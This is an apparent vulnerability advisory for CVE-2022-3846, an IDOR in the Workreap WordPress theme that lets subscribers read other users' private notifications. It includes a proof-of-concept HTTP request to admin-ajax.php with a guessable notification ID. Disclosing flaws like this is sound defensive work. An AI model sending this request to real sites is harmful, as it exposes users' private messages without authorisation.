Workreap – Freelance Marketplace and Directory < 2.6.3 – Subscriber+ Private Message Disclosure via IDOR | CVE 2022-3846 | Theme Vulnerabilities

Description

The theme has a vulnerability with the notifications feature as it's possible to read any user's notification (employer or freelancer) as the notification ID is brute-forceable.

Proof of Concept

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61

action=workreap_read_notification&id=6233&security=<nonce>

Affects Themes

Fixed in 2.6.3

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

6220c7ef-69a6-49c4-9c56-156b945446af

Timeline

Publicly Published

2022-11-12 (about 3 years ago)

Added

2022-11-11 (about 3 years ago)

Last Updated

2022-11-11 (about 3 years ago)

Other

Published

Title

Published

2025-11-29

Title

StreamTube Core < 4.79 - Unauthenticated Arbitrary User Password Change

Published

2025-07-08

Title

Support Board < 3.8.1 - Unauthenticated Authorization Bypass due to Use of Default Secret Key

Published

2025-05-16

Title

WP JobHunt <= 7.1 - Unauthenticated Insecure Direct Object Reference

Published

2024-03-20

Title

Plugin Permalink < 2.4.3.2 - Missing Authorization via get_uri_editor

Published

2025-10-15

Title

Truelysell Core < 1.8.7 - Unauthenticated Arbitrary User Password Change